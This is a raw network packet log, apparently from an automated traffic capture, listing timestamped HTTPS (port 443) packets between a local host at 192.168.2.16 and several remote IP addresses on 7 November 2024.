                                                                Nov 7, 2024 21:40:07.137943983 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.137979984 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.138000011 CET4434973813.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.138334990 CET49739443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:07.138397932 CET4434973913.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:07.138586998 CET49740443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.138654947 CET4434974013.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.138679028 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.138726950 CET49735443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.138731956 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.138739109 CET44349735188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.138776064 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.138797045 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.138802052 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.139388084 CET49738443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.139394999 CET4434973813.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.139415026 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.139436007 CET49739443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:07.139451027 CET4434973913.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:07.139473915 CET49740443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.139493942 CET4434974013.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.141895056 CET49747443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.141923904 CET44349747188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.142591000 CET49747443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.142838001 CET49747443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.142848015 CET44349747188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.161108971 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.179338932 CET4434973713.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.185157061 CET49739443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:07.185161114 CET49738443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.185161114 CET49740443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.185165882 CET49737443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.185187101 CET4434973713.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.217152119 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.217171907 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.232979059 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.233058929 CET49737443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.233082056 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.233091116 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.233138084 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.233506918 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.233515978 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.233573914 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.233653069 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.233722925 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.274184942 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.274308920 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.274715900 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.274805069 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.286958933 CET4434974013.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.287214041 CET4434974013.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.287221909 CET4434973813.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.287249088 CET4434973813.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.287329912 CET49740443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.287355900 CET49738443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.287377119 CET4434973813.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.287408113 CET4434973813.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.287456989 CET49738443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.288750887 CET49740443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.288777113 CET4434974013.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.289170027 CET49738443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.289182901 CET4434973813.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.291517019 CET4434973913.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:07.291579008 CET4434973913.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:07.291639090 CET49739443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:07.292129040 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.292319059 CET49739443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:07.292340994 CET4434973913.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:07.292696953 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.292721987 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.293595076 CET4434973713.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.293616056 CET4434973713.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.293662071 CET4434973713.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.293709993 CET49737443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.293745995 CET49737443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.293838978 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.293909073 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.294434071 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.294513941 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.295759916 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.295768976 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.296056032 CET49737443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.296066046 CET4434973713.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.297235012 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.298791885 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.298800945 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.299804926 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.299865961 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.300898075 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.300978899 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.301071882 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.301078081 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.344033957 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.344082117 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.356920958 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.357034922 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.357490063 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.357558966 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.398281097 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.398370981 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.398821115 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.398910046 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.434948921 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.435106993 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.435147047 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.435173035 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.435215950 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.435240984 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.435256004 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.435545921 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.435691118 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.435699940 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.436151028 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.436175108 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.436189890 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.436197042 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.436361074 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.438961029 CET443497414.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:07.439069033 CET49741443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:07.441874027 CET49741443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:07.441884995 CET443497414.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:07.442167997 CET443497414.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:07.451739073 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.451987982 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.452033997 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.452069998 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.452080011 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.452105999 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.452130079 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.452260971 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.452317953 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.452323914 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.452460051 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.452503920 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.452508926 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.481035948 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.481112003 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.481395960 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.481453896 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.488035917 CET49741443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:07.500078917 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.500092030 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.509907961 CET49741443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:07.521884918 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.521996975 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.522520065 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.522594929 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.523224115 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.523298979 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.548046112 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.553432941 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.553591013 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.553699017 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.553721905 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.553801060 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.553843021 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.553850889 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.554352045 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.554415941 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.554423094 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.554780960 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.554831982 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.554841042 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.555344105 CET443497414.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:07.568114042 CET44349743152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:07.568423033 CET49743443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:07.568438053 CET44349743152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:07.569449902 CET44349743152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:07.569510937 CET49743443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:07.569849014 CET49743443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:07.569906950 CET44349743152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:07.569991112 CET49743443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:07.570000887 CET44349743152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:07.571178913 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.571469069 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.571611881 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.571644068 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.571647882 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.571675062 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.571686029 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.572140932 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.572180986 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.572191000 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.572371960 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.572438002 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.572443962 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.595050097 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.595060110 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.605437994 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.605513096 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.605917931 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.605993032 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.606194973 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.606251001 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.606266022 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.606285095 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.606323004 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.606471062 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.606487036 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.610035896 CET49743443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:07.626049042 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.626061916 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.642036915 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.672400951 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.672508955 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.672574043 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.672590971 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.672941923 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.672971010 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.672986984 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.672995090 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.673034906 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.673041105 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.673696041 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.673721075 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.673744917 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.673746109 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.673757076 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.673784971 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.674072027 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.674099922 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.674226046 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.690557003 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.690850019 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.690893888 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.690910101 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.691131115 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.691180944 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.691190004 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.691239119 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.691293955 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.691299915 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.691569090 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.691616058 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.691621065 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.692034960 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.692079067 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.692085028 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.738034964 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.738044024 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.764839888 CET44349747188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.765119076 CET49747443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.765132904 CET44349747188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.766393900 CET44349747188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.766465902 CET49747443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.766814947 CET49747443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.766860008 CET49747443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.766870022 CET44349747188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.766926050 CET49747443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.766926050 CET49747443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.767235041 CET49751443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.767267942 CET44349751188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.767548084 CET49751443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.767741919 CET49751443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.767765999 CET44349751188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.785042048 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.791297913 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.791579008 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.791605949 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.791660070 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.791678905 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.791727066 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.791928053 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.792243004 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.792289972 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.792295933 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.792439938 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.792464018 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.792506933 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.792514086 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.792568922 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.804445028 CET44349743152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:07.804563999 CET44349743152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:07.804622889 CET44349743152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:07.804639101 CET49743443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:07.804688931 CET49743443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:07.805315971 CET49743443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:07.805329084 CET44349743152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:07.810930014 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.811332941 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.811363935 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.811393976 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.811403990 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.811414003 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.811445951 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.811733007 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.811794996 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.811903954 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.812232018 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.812262058 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.812267065 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.812282085 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.812320948 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.885018110 CET443497414.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:07.885044098 CET443497414.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:07.885051966 CET443497414.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:07.885065079 CET443497414.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:07.885092020 CET443497414.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:07.885160923 CET49741443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:07.885195017 CET443497414.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:07.885230064 CET49741443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:07.885262012 CET49741443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:07.909759045 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.909890890 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.909940004 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.910007954 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.910103083 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.910604000 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.910656929 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.910670996 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.910741091 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.911159992 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.911231995 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.929893970 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.929904938 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.929975033 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.930342913 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.930349112 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.930413961 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.930424929 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.930922031 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.930989981 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.930995941 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.931042910 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.931593895 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:07.931668043 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:07.994663954 CET443497414.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:07.994803905 CET49741443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:07.994831085 CET443497414.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:07.995006084 CET49741443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:07.995006084 CET49741443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:07.995022058 CET443497414.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:07.995187998 CET443497414.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:07.995220900 CET443497414.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:07.995266914 CET49741443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:08.009244919 CET49678443192.168.2.1620.189.173.10
                                                                Nov 7, 2024 21:40:08.028383970 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.028465033 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.028557062 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:08.028599024 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:08.029413939 CET44349745104.17.24.14192.168.2.16
